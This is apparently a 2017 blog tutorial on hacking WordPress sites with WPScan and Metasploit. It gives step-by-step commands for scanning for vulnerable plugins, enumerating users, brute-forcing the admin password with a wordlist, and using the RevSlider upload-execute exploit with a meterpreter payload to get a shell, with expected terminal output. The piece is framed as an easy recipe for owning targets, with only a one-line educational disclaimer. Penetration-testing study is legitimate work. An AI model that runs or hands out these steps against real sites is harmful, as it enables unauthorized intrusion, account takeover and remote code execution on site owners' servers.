WordPress Penetration Testing using WPScan & Metasploit

How To Hack A WordPress Website Using WPScan And Metasploit

AUGUST 2, 2017

In this tutorial, I will show you how to use WPScan and Metasploit to hack a WordPress website easily. You will learn how to scan WordPress sites for potential vulnerabilities, take advantage of vulnerabilities to own the victim, enumerate WordPress users, brute force WordPress accounts, and upload the infamous meterpreter shell on the target’s system using Metasploit Framework.

In short, I will explain very well the following:

• How To Use WPScan To Find Vulnerabilities To Exploit Effectively
• How To Critically Think And Examine Potential Vulnerabilities
• How To Take Advantage Of The Vulnerabilities Disclosed By WPScan
• How To Enumerate WordPress Users/Accounts
• How To Brute Force The WordPress Admin Account Password
• How To Use Metasploit To Exploit A Critical Plugin Vulnerability Discovered By WPScan
• How To Use A Payload In Metasploit To Exploit WordPress

Open WPScan

You can open up a terminal and type in wpscan

OR

go to Applications > Web Application Analysis > WPScan

 Update Your WPScan’s Vulnerabilities Database.

The first thing to do before is ensuring that your WPScan’s vulnerabilities database is up-to-date.

Type the subsequent command into terminal to update the database:

wpscan –update

Start Scanning Website For WordPress/Plugins/Themes Vulnerabilities

Type the subsequent command into terminal to scan the target’s website for potentially exploitable vulnerabilities:

wpscan —url targetwordpressurl.com

As we can see, WPScan has discovered various facts about the target’s website including and not limited to:

• XMLRPC.php (XML-RPC Interface) is open for exploitation like brute-forcing and DDoS pingbacks.
• WordPress core version is identified: 4.4.10
• 1 WordPress core vulnerability: Host Header Injection in Password Reset reported from the 4.4.10.
• WordPress theme and version used identified.

The Red ! sign refers to a specific component of a site being vulnerable to exploitation.

As WPScan reveals that the site has:

• Vulnerable Contact Form with a Security Bypass, File Upload RCE Available (References: WPVulnDB, SecurityFocus, CVE MITRE, PacketStormSecurity)
• Potentially Exploitable Visual Composer Multiple Unspecified XSS

It’s important to note that even when WPScan cannot determine a version of a specific plugin, it will print out a list of all potential vulnerabilities. It is beneficial to take the time to review, visit the reference sites individually, and execute these exploits to determine whether the target site is vulnerable to them or not. Just because a plugin version cannot be determined does not mean the site is not vulnerable.

It is beneficial to take the time to review vulnerabilities, visit the reference sites individually, and execute these exploits to determine whether the target site is vulnerable to them or not. Just because a plugin version cannot be determined does not mean the site is not vulnerable.

Reference Sites You Should Use To Conduct Research For Potential Vulnerabilities

• https://wpvulndb.com
• https://packetstormsecurity.com
• https://www.exploit-db.com
• https://cve.mitre.org
• http://www.securityfocus.com

The target’s site is vulnerable to two critical Slider Revolution exploits:

• Local File Inclusion
• Shell Upload

We can carry out these attacks easily.

For example, we can use the Slider Revolution Upload Execute Exploit via Metasploit.

Metasploit already has this exploit ready to use for your pleasure.

One more thing before we proceed with the Metasploit Framework Tutorial:

How To Enumerate WordPress Users/Accounts

The WordPress user/account enumeration tool integrated into WPScan is deployed to obtain a list of registered WordPress users from the target’s website.

User enumeration is imperative when a hacker needs to obtain access to a particular target via brute forcing the target’s WordPress administrator account.

The WPScan user enumeration tool will scan the target’s site for WordPress authors and usernames.

Deploy the subsequent command to enumerate the WordPress users:

• wpscan —url targetwordpressurl.com –enumerate u

As we can see, WPScan’s User Enumeration Tool identified:

• Two user accounts, particularly the most important: admin (Default admin name left unchanged)
• admin is still used.
• Second account may possess admin privileges, can brute force both simultaneously if required.

How To Brute Force The WordPress Admin Account Password

Type the subsequent command into terminal to brute force the password for user admin:

• wpscan –url targetwordpressurl.com –wordlist /usr/share/wordlists/rockyou.txt (replace wordlist and location with your choice) –username admin (your target’s username) –threads 2 (replace the number of threads you would like to use)

For a clean version without those annoying brackets I just used, here is the command:

• wpscan —url targetwordpressurl.com–wordlist /usr/share/wordlists/rockyou.txt –username admin –threads 2

Eventually, you could see the password listed in terminal beside the login ID.

For more articles on brute forcing, check out another article I’ve written here.

Launch Metasploit Framework Via Your Linux Distro Desktop

FYI, even though this RevSlider plugin vulnerability has been patched, many WordPress websites out there still haven’t updated their RevSlider plugin, which makes them susceptible to getting owned by 1337 hax0rs.

For more information on the module we’re about to use, click here.

Type In The Subsequent Commands Into Terminal:

• search revslider
• use exploit/unix/webapp/wp_revslider_upload_execute
• show options

You need to set your target’s website URL using the subsequent command:

set rhost 127.0.0.1/targetsiteurl.com  (Replace IP Address with site’s IP or simply replace target’s site URL.)

AND

You need to set your target’s URI base path to their WordPress application using the subsequent command:

set targeturi /wordpress  (Replace /wordpress with individual directory path if WordPress is not installed in /)

Use A Payload

We need to set a payload. In our demonstration, we use the notorious meterpreter payload to pwn our target.

Type in the subsequent commands in Terminal:

• set payload php/meterpreter/bind_tcp
• show options

Make sure that rhost for both module and payload options are filled with your target’s site IP address/URL.

You could check/confirm if the target is vulnerable by typing in “check” command into the terminal.

You would get the response message: “The target appears to be vulnerable.” We already know that, but just to check again.

Now to get the meterpreter shell on the target’s system, simply type in “exploit” command into the terminal.

If successful, the following messages will show in terminal:

• “127.0.0.1 (Target’s IP Address Replaced) – Our payload is at /wordpress/wp-content/plugins/revslider/temp/upload“
• “127.0.0.1 (Target’s IP Address Replaced) – Calling payload…“
• “Deleted oCDNSJ.php“
• “Deleted ../revslider.zip“

I hope you’ve really enjoyed this tutorial.

NOTE: This is for educational purpose only.